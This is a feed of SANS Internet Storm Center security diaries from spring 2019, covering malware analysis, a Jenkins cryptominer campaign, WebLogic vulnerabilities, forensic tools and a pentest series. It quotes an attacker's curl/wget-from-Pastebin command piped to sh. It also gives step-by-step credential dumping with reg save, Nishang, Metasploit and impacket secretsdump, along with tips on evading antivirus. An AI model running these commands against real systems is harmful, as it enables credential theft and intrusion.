Subscribe to SANS hírcsatorna SANS
SANS Internet Storm Center - Cooperative Cyber Security Monitor
Frissítve: 33 perc 22 másodperc
2019. május 8.

Email roulette, May 2019, (Wed, May 8th)


For today's diary I play a game of email roulette.  My version of email roulette is picking a recent item of malicious spam (malspam), running the associated email attachment in a live sandbox, and identifying the malware.  I acquired a recent malspam example through VirusTotal (VT) Intelligence.  Let's see what the roulette wheel give us today!

Searching for malspam attachments in VT Intelligence

VT Intelligence is a subscription server, and from what I understand, it's fairly expensive.  Fortunately I have access through my employer.  In the VT Intelligence search window, I used the following parameters:

tag:attachment fs:2019-05-07+ p:3+

This returned anything tagged as an email attachment, first seen on or after 2019-05-07, with at least 3 vendors identifying an item as malicious.  After the results appeared, I sorted by the most recent submissions.

Shown above:  Searching and sorting in the VT Intelligence portal.

Shown above:  Results sorted by most recent at the time of my search.

The three most recent results I saw were 7-zip archives (.7z files).  The file names did not use ASCII characters, but were base64 encoded.  The base64 string represents UTF-8 characters, where the format is name:"=?utf-8?B?[base64 string]?="

I picked the most recent result and selected the relations tab, which revealed the associated malspam.  Then I retrieved that email from VT Intelligence.

Shown above:  Pivoting on the attachment to find its parent email.

Shown above:  The email opened in Thunderbird on a Windows 7 host.

The attached 7-zip archive contained 3 files with different names, but they were all the same file hash, so they were the same malware.  I extracted them and ran one on a vulnerable Windows host.  The result was a Gandcrab ransomware infection.

Shown above:  Encrypted files and the ransom note on my infected Windows host.


The following are indicators associated with this infection:

SHA256 hash: 39f97e750a8ebcc68a5392584c9fd8edc934e978d6495d3ae430cb7ee3275ffe

  • File size: 157,810 bytes
  • File description: Example of Korean malspam (.eml file) pushing Gandcrab

SHA256 hash: 5444841becddce7ef2601752df63db2a9d067d46a359d8b0288da2ebf494ff41

  • File size: 112,792 bytes
  • File description: 7-zip archive (.7z file) attached to Korean malspam

SHA256 hash: df53498804b4e7dbfb884a91df7f8b371de90d6908640886f929528f1d6bd0cc

  • File size: 173,568 bytes
  • File description: Gandcrab executables (.exe files) extracted from the above .7z archive
  • Any.Run sandbox analysis

Final words

This round of email roulette gave us a Gandcrab ransomware infection.  What type of malware might I find next?  Perhaps we'll know when I try this again next month for another diary.

Brad Duncan
brad [at]

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.
2019. május 8.

Vulnerable Apache Jenkins exploited in the wild, (Tue, May 7th)

An ongoing malicious campaign is looking for vulnerable Apache Jenkins installations to deploy a Monero cryptominer. The dropper uses sophisticated techniques to hide its presence on the system, to move laterally and to look for new victims on the internet. It also downloads and runs the miner software – of course.

The exploited vulnerability, CVE-2018-1000861 [1], was published in December 2018. It affects Stapler Web framework used by Jenkins 2.153 and earlier. It may allow attackers to invoke methods on Java objects by accessing crafted URLs.

Looking for publicly available exploits for this vulnerability, I could find a detailed proof of concept published early March this year.

After analyzing the threat which attacked one of my honeypots, I created the diagram shown in the picture below. Follow the numbers in blue to understand each step.

Vulnerability Exploitation

In the picture below, you can see the exploitation occurring. 

Notice that there is a base64 encoded content piped to bash for execution. Decoding this content, it was possible to see that this campaign is using Pastebin as the C2:

(curl -fsSL hxxps://pastebin[.]com/raw/wDBa7jCQ||wget -q -O- hxxps://pastebin[.]com/raw/wDBa7jCQ)|sh

The content of the paste ‘wDBa7jCQ’ is no longer available, but the content was another paste:

(curl -fsSL hxxps://pastebin[.]com/raw/D8E71JBJ||wget -q -O- hxxps://pastebin[.]com/raw/D8E71JBJ)|sed 's/\r//'|sh

The content of ‘D8E71JBJ’ paste is no longer available also, but it was the shell script down in following images.

The Dropper

The dropper named “Kerberods” (not “Kerberos” as the protocol) caught my attention due to the way it is packed and the way it acts if it has ‘root’ privileges on the machine.

After analyzing the binary, I could see that the packer used was a custom version of ‘UPX’. UPX is an open source software and there are many ways UPX can be modified to make it hard to unpack the file using regular UPX version. There is a great presentation on this subject by @unixfreaxjp [2] called ‘Unpacking the non-unpackable’ which shows different forms to fix ELF headers in order to unpack files.

Fortunately, in this case, the UPX customizations involved just the modification of the magic constant UPX_MAGIC_LE32 from 'UPX' to some other three letters. Thus, reverting it to UPX in different parts of the binary, it was possible to unpack the binary with the regular version of UPX.

The Glibc hooks

The other interesting part is the way ‘Kerberods’ acts to persist and hide itself if has root privileges on the machine.

If it is the case, it drops, compiles and loads a library into the operating system that hooks different functions of Glibc to modify its behavior. In other words, it acts like a rootkit.

In the image below it is possible to see that the function ‘open’ will now check for some strings in the ‘pathname’ to act in a different way. The intention is to avoid anyone (including root) to be able to open the binary ‘khugepageds’, which is the cryptominer, the ‘’, which is the file that loads the malicious library and the library ‘’ itself.


Another hook, to show one more example, hides the network connection to the private mining pool and the scan for open Redis servers, as seen in the image below.


Indicators of Compromise (IOCs)



Renato Marinho
Morphus Labs| LinkedIn|Twitter

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.
2019. május 7.

ISC Stormcast For Tuesday, May 7th 2019, (Tue, May 7th)

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.
2019. május 6.

Text and T<NUL>e<NUL>x<NUL>t<NUL>, (Mon, May 6th)

I gave a few tips over the last weeks to help friends with processing files. Turned out that each time, UNICODE was involved.

Xavier had an issue with a malicious UDF file. I took a look with a binary editor:

The first bytes, FF FE, reminded me of a BOM: a Byte Order Mark. FF FE or FE FF can be found at the start of UTF-16 text files. It indicates the endianness: little endian (screenshot) or big endian.

Command file confirmed the endianness:

The fact that it contains just null bytes is unusual, but then again, this is actually not a text file, but an UDF file that was probably opened and saved with a text editor.

Another friend had a problem having a an XML file parsed by a SIEM. It threw an unusual, obscure error. It turned out here too, that the file was UNICODE, while the SIEM expected an ASCII file.

When opening text files with an editor, it's often not trivial to determine the encoding of the file. And not everyone is comfortable using an hexadecimal error.

If you want a command-line tool, I recommend the file command.

For a GUI tool on Windows, you can use the free text editor Notepad++.

It displays the encoding of the displayed file in its status bar:

LE BOM tells us that the file contains a BOM and is little endian. UCS-2 (an ISO standard equivalent with UNICODE and the basis for UTF-16). And we get bonus information: the line separator is carriage return / linefeed (CR LF). This was something Xavier had to deal with too.

This editor can of course convert encodings:


Didier Stevens
Senior handler
Microsoft MVP

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.
2019. május 6.

ISC Stormcast For Monday, May 6th 2019;id=6484, (Sun, May 5th)

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.
2019. május 3.

A few Ghidra tips for IDA users, part 3 - conversion, labels, and comments, (Fri, May 3rd)

In this entry in my series, I'll look at a few more of the features I regularly use in IDA and how to accomplish the same in Ghidra.

The first one is simple conversion. In this case, hex to ASCII characters (classic stack strings stuff that we cover in Day 5 of FOR610). I miss IDA's 'R' key mapping, but that is currently taken by View/Edit References From. You can change that or create your own key mapping, Ctrl-Alt-R isn't currently taken, so that's what I use. Just like in IDA, you can right-click on the value, but then you have to choose Convert and then Char from the submenu.

Another of the features I use regularly, is renaming arguments, variables, and functions as I begin to figure out their purposes. In IDA, this is the 'N' key, in Ghidra, it is the 'L' key for Label. It works exactly like in IDA. In the screenshot below, you'll see it in the right-click menu.

And below is the actual dialog to do the renaming.

And, the last functionality I want to cover in this post is comments. There are 4 (well, 5) types of comments that you can create with Ghidra. Pre-comments which will appear above the instruction where you place it, post-comments which appear below, EOL (and repeatable) comments at the end of the line, and Plate comments, which change the generic "Function" comment at the top of the function. I actually like some of the additions, especially the plate comment which can be used to fill in info on what I've discovered about the functionality of the function in question.

And here are examples of each

I've got at least one more post in this series, probably next week. As with the others, if you have any tips, comments, corrections, etc. let me know via our contact page, e-mail, or via the comments below. Until next time,...

Jim Clausing, GIAC GSE #26
jclausing --at-- isc [dot] sans (dot) edu

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.
2019. május 3.

ISC Stormcast For Friday, May 3rd 2019;id=6482, (Fri, May 3rd)

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.
2019. május 2.

Another Day, Another Suspicious UDF File, (Wed, May 1st)

In my last diary, I explained that I found a malcious UDF image used to deliver a piece of malware[1]. After this, I created a YARA rule on VT to try to spot more UDF files in the wild. It seems like the tool ImgBurn is the attacker's best friend to generate such malicious images. To find more UDF images, I used the following very simple YARA rule:

rule ImgBurnedFile { strings: $s1 = "ImgBurn v2" nocase wide condition: all of them and new_file }

I received some false positive hits but one file looked particularly interesting. In YARA rules, when you specify the keyword “wide”, YARA will search for strings encoded with two bytes per character (read: Unicode).

The file that I spotted was indeed in Unicode text and scored "0" on VT (SHA256: bef7985aa8bda67e628de4100ce5d7f1e26754199578d7fc72ddbe00f3427c9f)[2]

$ file bef7985aa8bda67e628de4100ce5d7f1e26754199578d7fc72ddbe00f3427c9f.bad bef7985aa8bda67e628de4100ce5d7f1e26754199578d7fc72ddbe00f3427c9f.bad: Unicode text, UTF-32, little-endian

I decoded the file with the iconv tool and got an ISO9660 image:

$ iconv -c -f UTF-16LE -t ASCII bef7985aa8bda67e628de4100ce5d7f1e26754199578d7fc72ddbe00f3427c9f.bad \ >bef7985aa8bda67e628de4100ce5d7f1e26754199578d7fc72ddbe00f3427c9f-decoded.bad $ file bef7985aa8bda67e628de4100ce5d7f1e26754199578d7fc72ddbe00f3427c9f-decoded.bad bef7985aa8bda67e628de4100ce5d7f1e26754199578d7fc72ddbe00f3427c9f-decoded.bad: ISO 9660 CD-ROM filesystem data 'NEW_FOLDER'

But it was impossible to mount the image:

$ mount -t iso9660 -o loop \ bef7985aa8bda67e628de4100ce5d7f1e26754199578d7fc72ddbe00f3427c9f-decoded.bad /mnt/udf mount: /mnt/udf: wrong fs type, bad option, bad superblock on /dev/loop3, missing codepage or helper program, or other error.

While discussing about this file with Didier, he found that the file was also converted from UNIX to Dos (with 0x0A’s replaced by 0x0D0x0A’s). I found 52 occurences of ‘\r\n’ in the file:

$ grep --binary "\r\n" -c bef7985aa8bda67e628de4100ce5d7f1e26754199578d7fc72ddbe00f3427c9f-decoded.bad 52

I converted them using dos2unix:

$ dos2unix -f -n bef7985aa8bda67e628de4100ce5d7f1e26754199578d7fc72ddbe00f3427c9f-decoded.bad \ bef7985aa8bda67e628de4100ce5d7f1e26754199578d7fc72ddbe00f3427c9f-decoded-unix.bad dos2unix: converting file bef7985aa8bda67e628de4100ce5d7f1e26754199578d7fc72ddbe00f3427c9f-decoded.bad to file \ bef7985aa8bda67e628de4100ce5d7f1e26754199578d7fc72ddbe00f3427c9f-decoded-unix.bad in Unix format...

Once again, no luck, the image could not be mounted. As Didier likes to work more with Windows tools, he decoded the file on his side with UltraEdit and successfully mounted the image via the tool UltraISO. Finally, it was possilble to extract the PE file ‘SHIPMENT.EXE’ (SHA256: 22238c4b926d3c96d686377d480e5371d22a5839367db687922242c45c8321dc). The PE file is corrupted probably due to the aggressive search/replace of all ‘\r\n’ in the file. The PE file is a compiled AutoIT script. I uploaded the sample by myself on VT and it got a score of 11/71[3].

The next question is: Why was the initial file encoded? It is to download it as a second stage in a stealthy way? The stage one should then decode it properly (but how to not corrupt the PE file?). Did you already seen the same kind of malicious UDF images, please share!


Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.
2019. május 2.

ISC Stormcast For Thursday, May 2nd 2019;id=6480, (Thu, May 2nd)

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.
2019. május 1.

VBA Office Document: Which Version&#x3f;, (Wed, May 1st)

In some cases, like malicious Word documents without VBA source code, you want to know which version of Office was used to create the VBA macros. Because compiled macros (VBA) don't run on all versions.

This information can be found inside the _VBA_PROJECT stream:

The 3rd and 4th bytes in this stream are a little endian word, whose value indicates the version of Office that was used to create the VBA code. This is all documented by Microsoft, except for the field values themselves.

Here is a list I compiled for different Office versions (Windows):

Office Version 32-bit 64-bit 95 0x0004 N/A XP 0x0073 N/A 2003 0x0079 N/A 2007 0x0085 N/A 2010 0x0097 0x0097 2013 0x00A3 0x00A6 2016 0x00AF 0x00B2 2019 0x00AF 0x00B2










If you have other info for other versions, please post a comment or submit a sample.

Didier Stevens
Senior handler
Microsoft MVP

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.
2019. május 1.

ISC Stormcast For Wednesday, May 1st 2019;id=6478, (Wed, May 1st)

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.
2019. április 30.

Introduction to KAPE, (Tue, Apr 30th)


In this diary, I will talk about KAPE by SANS Instructor Eric Zimmerman. 


What is KAPE?

Kroll Artifact Parser and Extractor (KAPE) is primarily a triage program that will target a device or storage location, find the most forensically relevant artifacts (based on your needs), and parse them within a few minutes.

Because of its speed, KAPE allows investigators to find and prioritize the more critical systems to their case. Additionally, KAPE can be used to collect the most critical artifacts prior to the start of the imaging process.

While the imaging completes, the data generated by KAPE can be reviewed for leads, building timelines, etc.


KAPE can be downloaded from the following link:

Once you download and unzip KAPE you can find two executables:

One is kape.exe which is the command line version and the other one is gkape.exe which is the GUI version.


For this diary, I am going to use the GUI version. Like most of forensics acquisition tools, KAPE needs an administrative privilege to do its job.

To collect data first click on the “Use Target Options” checkbox then choose what do you want to collect. In this example, I am going to select the C drive as a target source and I am going to choose the following “EvidenceOfExecution, RegistryHives, and FilSystem. 

This step will just collect the evidence file. To parse these files, you need to choose it from the modules, For this example, I will choose “JLECmd,MFTECmd_$MFT,RegRipper-sam and RegRipper-security “.

Unfortunately, some of the modules do not come by default with KAPE. One of these modules is reg.exe. but that’s not the end of the world, you can just go kape\modules and open the yaml of the specific module. In this example, I am going to open RegRipper-sam.mkape and check which additional module does it need. 


Now just follow the instructions in the file. You need to specify the output directory for both Target and Modules.Now back to the gkape and click “Execute”.   Or if you would like to run it from a command line you can just copy the command line version of the same selection from current command line section 



(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.
2019. április 30.

ISC Stormcast For Tuesday, April 30th 2019;id=6476, (Tue, Apr 30th)

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.
2019. április 29.

Update about Weblogic CVE-2019-2725 (Exploits Used in the Wild, Patch Status), (Sun, Apr 28th)

Late last week, news emerged about a potential new vulnerability in WebLogic [1]. The vulnerability was first reported to the Chinese National Vulnerability Database (CNVD). A proof of concept exploit labeled "CVE-2018-2628" was made available at the same time. The name of the exploit caused some confusion.  CVE-2018-2628 refers to a WebLogic vulnerability that was fixed last year in Oracle's April critical patch update.

On Friday, Oracle released a statement clarifying the issue [2]. The vulnerability is new and was not patched by any critical patch update, including the last one released this month. Oracle assigned CVE-2019-2725 to identify this new vulnerability. On Friday, Oracle released a patch for WebLogic 10.3.6. A patch for WebLogic 12.1.3 should be released on Monday (today) April 29th.

We already see active exploits of the vulnerability to install crypto coin miners in our honeypot. The proof of concept exploit released last week allows the trivial install of a shell on a WebLogic server. However, remember that our honeypots are not "special" in the sense that they are only seeing random exploits. We have to assume that at the same time, targeted attacks are underway to wreak more havoc.

[pcap file of some test runs of one of the exploits against a vulnerable server]

If you find a vulnerable server in your environment, assume that it has been compromised. Do not just remove the coin miner. There may have been additional attacks.

CVE-2019-2725 is yet another deserializing vulnerability affecting WebLogic. WebLogic's design makes it particularly prone to these types of vulnerabilities. Do not expose WebLogic to the Internet if you can help it. I doubt that this was the last such vulnerability.

A quick look at the patch shows that it includes the "validate" function that was added and later enhanced in response to similar flaws. But a quick look didn't show any obvious additions. NSFocus had a great discussion of this function following prior vulnerabilities [3]. 

On our test server, we only saw logs indicating an attack if the script the attacker attempted to execute failed. For example, in the sample below, the attacker tried to execute "wget", but "wget" was not installed on the system:

####<Apr 28, 2019 10:47:02 PM UTC> <Error> <HTTP> <0aa00a61ebfc> <AdminServer> <[ACTIVE] ExecuteThread: '0' for queue: 'weblogic.kernel.Default (self-tuning)'> <<WLS Kernel>> <> <> <1556491622309> <BEA-101019> <[ServletContext@2141998910[app:bea_wls_internal module:bea_wls_internal.war path:/bea_wls_internal spec-version:null]] Servlet failed with IOException Cannot run program "wget": error=2, No such file or directory

I will try to update this post on Monday as we learn more.

(thanks to our handler Renato Marino to significantly contribute to this post)


Johannes B. Ullrich, Ph.D. , Dean of Research, SANS Technology Institute

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.
2019. április 29.

ISC Stormcast For Monday, April 29th 2019;id=6474, (Mon, Apr 29th)

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.
2019. április 27.

Quick Tip for Dissecting CVE-2017-11882 Exploits, (Sat, Apr 27th)

In diary entry "Dissecting a CVE-2017-11882 Exploit" I analyze an equation editor exploit. These kind of exploits have become prevalent, I often see malware exploiting this vulnerability.

In my diary entry, I use my tool to dissect the exploit using a long string of format specifiers. This is not practical if you have to do this often:

That's why I have now added a library of format strings to my tool, eqn1 is the format string to use for this exploit:

So in stead of typing "-f "<HIHIIIIIBBBBBBBBBB40s..." ", you can now just type: "-f name=eqn1".


Didier Stevens
Senior handler
Microsoft MVP

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.
2019. április 26.

Pillaging Passwords from Service Accounts, (Fri, Apr 26th)

In our "pretend pentest" that we've been running these last few days, we've now got all the domain admins listed, all the service accounts found and listed, and the intersection of those two things - the service accounts that are either local admin or domain admin.
So what's the obvious next step?  Let's recover the passwords for those target service accounts!  Because once we have the full credentials, we have admin rights that no SEIM or systems admin will be tracking the use of - these accounts are almost universally ignored, since they login every time those services start (say during a system restart).  So if this is for instance a service account with domain or local admin rights that's on every server and workstation, you are now "better than domain admin".  You have all the rights, but no system controls are watching you!

Let's get on with the job at hand.

First of all, credentials for service accounts are stored in the local registry, as what's called "LSA Secrets" in the registry key HKEY_LOCAL_MACHINE/Security/Policy/Secrets.  Because the service needs to read the actual password to login as the service account, that password is in the registry in clear-text.  Yup, you read that right - this is why service accounts are such a great target.  LSA Secrets are well protected however, you can't just fire up regedt32 and read them - only the SYSTEM account has rights.  So you need ... yes, some powershell!  Not only that, many of today's tools are based on some powershell posted way back in the day on!
(Thanks TrueSec!!  In fact, thanks from all of us! )

Or if you're not in the mood for PowerShell, you could use some Python tools, or Metasploit or Mimikatz works too - choose your own adventure!  Often you'll need to try a few different methods, and then maybe wrap one in some "AV evasion" code to make it work for you, but the results are worth it in the end!!


Those original scripts from microsoft don't work on modern hosts with any patches applied at all, but of course there's a toolkit that's improved on these scripts over time.  I generally use Nishang for the PowerShell-centric "I'm on the box" approach to LSA Secret recovery
Nishang can run locally on the Windows host being targetted, or you can of course use PSRemoting.  The problem with this tool is that if there's an AV product in play anywhere in the chain, it will very likely have a problem with you running Nishang.  In fact, even downloading this on a Windows host with a default install (ie - with W10 Windows Defender in play) can be a problem.

Anyway, once it's installed, the execution if pretty straightforward:

> Import-Module .\nishang\Gather\Get-LSASecret.ps1
> Import-Module ./nishang/Escalation/Enable-DuplicateToken.ps1
> Enable-DuplicateToken
> Get-LSASecret

Name                                Account        Secret                ComputerName
----                                -------        ------                ------------
_SC_Service Name Being Targeted    .\SVCAccount    Passw0rd123           ComputerName


Metasploit of course has a module for this. You can run it locally or (more likely) remotely.  The module is post/windows/gather/lsa_secrets.
Because endpoint protection programs tend to focus so much on Metasploit (which of course tells us just how good this tool is), you need to be careful where and how you run it if the goal is to get this job done with any degree of stealth.  You'll want to put some up-front work into evading whatever your client has for AV - this work pays off in all kinds of ways if the pentest you're running is longer than a few days.  This method does a great job though, even though (depending on the module you're running) it'll tend to scream at the AV solutions "Look! Look at me! I'm running Metasploit!"
The MetaSploit method is a simple as "run post/windows/gather/lsa_secrets"

For me the most attractive thing about using Metasploit is that you can script the exploits.  So if you need to, you can run 4-5-6 exploits against hundreds of machines in one go.

Dumping LSASS

You can dump the LSASS process memory and recover service passwords (and a ton of other stuff too) from that, but that becomes less and less reliable over time as Microsoft puts more fences and protections around LSASS.  I've never had to go this way on a real engagement.  The easier method is to run the MimiKatz PowerShell Module and just watch the magic happen.  That is if you put the work into evasion against your endpoint protection solution to allow MimiKatz to run.


Impacket makes a great little python based tool to accomplish the same thing.  This is my first, go-to, it almost always works method - mainly because all you run on the target host is standard windows commands, then the rest of the attack is on the attacker's host.  This makes it the least likely of these methods to trigger any AV alerts or other security measures.

First, from the local host we dump the 3 registry hives that are in play:

reg save hklm\sam sam.out

reg save hklm\security security.out

reg save hklm\system system.out

Now take those files and get thee to your Kali VM!   If you don't have impacket installed yet (it's not in the default install), there's no time like the present.  To install:

$ sudo apt-get install python-dev python-pip -y

$ pip install --upgrade pip

$ sudo pip install pycrypto pyasn1 pyOpenSSL ldapdomaindump

$ git clone

$ cd impacket

$ sudo python install

(in most cases you don't need all of those pre-reqs, I put them all in just in case).  Now you're good to go:

impacket-secretsdump -sam ./sam.out -security ./security.out -system ./system.out LOCAL

(you'll find a bunch of other interesting security stuff in this tool's output - all the local account password hashes for one thing!)

At the bottom of the output, you'll see what we're looking for, the locally stored password for that service account!!  In this case I put a "fake" account on my SFTP server service (Solarwinds SFTP doesn't have a service account by default).

That's it - no fuss, no muss, and best of all, nothing to trigger AV or any similar "endpoint next-gen machine-learning AI user behavioural analysis security" product on the target host.


Other tools like CrackMapExec do a good job as well - I haven't used that one specifically yet, really the impacket method has done the job for me so far.  While I tend to have a "try one or two new things" or "write one new tool" rule for each test, I haven't gotten around to using any other tools for this particular thing.  

Do you use a different tool to dump service passwords?  Does your tool collect more useful information than just that particular thing?  Or maybe you've got a cool AV evasion that relates to this?   Please, use our comment form and share your experiences on this!

Rob VandenBrink

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.
2019. április 26.

ISC Stormcast For Friday, April 26th 2019;id=6472, (Fri, Apr 26th)

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.
2019. április 25.

Service Accounts Redux - Collecting Service Accounts with PowerShell, (Thu, Apr 25th)

Back in 2015 I wrote up a "find the service accounts" story  - (yes, it really has been that long).  The approach I wrote up then used WMIC.  Those scripts saw a lot of use back in the day, but don't reflect the fastest or most efficient way to collect this information - I thought today was a good day to cover how to do this much quicker in PowerShell.

Why would you need to do this?  In a penetration test or an internal security assessment, you normally want to enumerate any services that don't use the built-in Microsoft Service Accounts.  This is because actual service accounts almost never see a password change, and almost always are given local administrator or domain administrator rights.  Mainly because if you're going to be a software vendor that's dumb enough to still use Windows XP era service accounts, you might as well go all the way and make those accounts Domain Admin for any malware that wants to collect those passwords (stay tuned, we'll be doing this tomorrow!).  Microsoft's current recommended approach is to use the various built-in service accounts for services.  These don't have passwords, and can't be used for lateral movement to other workstations or servers.

That being said, let's pretend to be malware and collect those service accounts across an AD domain!

$targets =get-adcomputer -filter * -Property DNSHostName
$vallist = @()
$i = 1
$count = $targets.count

foreach ($targethost in $targets) {
  write-host $i of $count -  $targethost.DNSHostName
  if (Test-Connection -ComputerName $targethost.DNSHostName -count 2 -Quiet) {
    $vallist += Get-WmiObject Win32_service -Computer $targethost.DNSHostName | select-object systemname, displayname, startname, state
$vallist | export-csv all-services.csv

A few things to discuss.
First of all, $i, $count, and the "write-host" line are there just so that if you have several thousand hosts to enumerate, you can ensure that your script isn't hung, and how far along it might be at any given time.

The "Test-connection" check is there so that you don't wait several seconds trying to connect up to remote hosts that might not be up.

Also, this can only enumerate hosts that are actually up and accept a connection - you likely want to run this script during the day.  If you start your script and see that it's going to take longer than a business day to complete (for a larger domain for instance), you might want to pause it towards the end of the business day, and restart it the next morning after everyone is back at their desks.

OK - so now that the script has run, what have we found?  What we have is the list of **all** services that are installed on all hosts in the domain, along with the account that's used to start the service.

This is great for system admins looking for one thing or another, but for most security purposes you don't want the ones that are using the built-in service accounts.  To filter those out, you want to remove any service that is started by these accounts:

  • NT AUTHORITY\LocalService
  • LocalSystem
  • NT AUTHORITY\NetworkService
  • or an empty field

To do this, add these lines to the bottom of your script

$filtlist = @("LocalService", "LocalSystem", "NetworkService", "NT AUTHORITY\LocalService", "NT AUTHORITY\NetworkService", "NT AUTHORITY\NETWORK SERVICE", "NT AUTHORITY\LOCAL SERVICE")
$TargetServices = $vallist | Where-Object { $filtlist -notcontains $_.startname }

$TargetServices | export-csv bad-services.csv

Things to note in this bit of code?  the "contains" and "notcontains" operators are case-insensitive, so you upper / lower case doesn't matter in your filter.

So, what can we do with this list if we're attacking a domain?  We can use the domain admin and local admin lists that we sleuthed yesterday, and see which of these service passwords are domain admins!

Let's take that list of $TargetServices, and list the offending accounts:

$TargetSVCAccounts = $TargetServices.startname | Sort-Object -Unique


In a different domain it's common to also see service accounts that are local to the machine being enumerated, often those will have local admin rights, and often you'll find that those same (local admin) service userid and password are used on all workstations and often on all servers - which gets you almost the same access as domain admin rights (oops).

Normally the lists that come out of these scripts are short enough that I can compare them by eye to the list of local and domain admins we collected in yesterday's story.  But if you have one of those unfortunate domains where dozens or hundreds of people have domain or local admin rights, you might want to add a bit more code:

$SVCDomAdmins = @()
$Admins = $DomainAdmins.SAMAccountName.toupper()

Foreach ($Acct in $TargetSVCAccounts) {
    $a = $Acct.toUpper().Trim("AD\").Trim("@AD.INT")
    if ($Admins.Contains($a)) {$SVCDomAdmins += $a}

$SVCDomAdmins | Sort-Object -Unique | export-csv Service-DomainAdmins.csv

To find Service Accounts that are local admins, it's the exact same code, but replace line 2 with "$Admins += $localadmins.AdminID.toupper()"

If you have a minute today, try this on your domain - use our comment form to let us know if you find anything interesting!

What will we do with this list of accounts next?  Stay tuned for the next installment tomorrow :-)


Rob VandenBrink

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.
2019. április 25.

Unpatched Vulnerability Alert - WebLogic Zero Day, (Thu, Apr 25th)

The news today is full of a new deserialization vulnerability in Oracle WebLogic.  This affects all current versions of the product (the POC is against 10.3, but 12.x versions are also affected).  The vulnerability affects the wls9_async_response package (which is not included by default in all builds), so the workaround is to either ACL the Z/_async/* and /wls-wsat/* paths, or delete wls9_async_response.war.  A successful attack gets the attacker remote code exec on the vulnerable server.

The root cause here seems to be that the affected WAR components ingest and process all serialized data, and have a blacklist of "bad" content.  What this means to me is that we're likely to see a number of similar vulnerabilities / attacks crop up over the next while, until Oracle changes this approach.

Indications are that this is in the "tens of thousands" of affected sites, not hundreds or thousands or millions (not yet at least).

The vulnerability is posted as CNVD-2018-07811 (China National Vulnerability Database) at  We don't have a CVE yet.

This bug was originally disclosed by the China Minsheng Banking Co.  There's a good write-up by the KnownSec 404 Team with  a bit more detail here:

This comes just one week after Oracle's "Patch Everything" Critical Patch Update (CPU) last week.  The next CPU isn't due for 3 months, so it'll be interesting to see what the out-of-band response patch or patches (if any) to this might be.

Stay tuned - we'll udpate this story as we get more information - in particular if we see attacks in the wild we'll post IoC's as we get them.

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.